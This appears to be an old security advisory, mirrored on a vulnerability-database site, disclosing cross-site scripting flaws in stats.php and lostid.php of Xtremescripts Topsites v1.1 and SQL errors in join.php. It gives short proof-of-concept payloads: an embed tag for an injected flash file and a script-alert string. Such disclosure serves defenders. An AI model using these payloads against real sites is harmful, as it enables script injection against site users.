Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12752
HistoryMay 20, 2006 - 12:00 a.m.

Xtremescripts Topsites v1.1

2006-05-2000:00:00
vulners.com
18
JSON

Xtremescripts Topsites v1.1

Homepage:
http://www.xtremescripts.com/topsites.php

Description:

Xtreme Topsites is a popular topsite PHP script for websites. Most commonly
used across anime websites at the moment. The topsite will count hits/clicks
in and hits out and will rank them on total hits so that the site with the most
hits will be number 1.

Effected files:
stats.php
join.php
lostid.php

Exploit:
stats.php allows embedded objects which in turn can cause a XSS.

example:

http://www.example.com/xtremets/stats.php?id=1 <embed allowScriptAccess="never"src="harmfulflash.swf"
quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer&quot; type="application/x-shockwave-flash"
width="

0" height="0"></embed>

lostid.php input data isn't properally sanatized & filtered which allows for XSS

example:

put in box: <script>alert('hi')</script>

Input data on join.php isn't sanatized and can create mysql errors if users input malicious data.

example:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the
right

syntax to use near 'hi'','9cdfb439c7876e703e307864c9167a15','0','19052006','-')' at line 2

JSON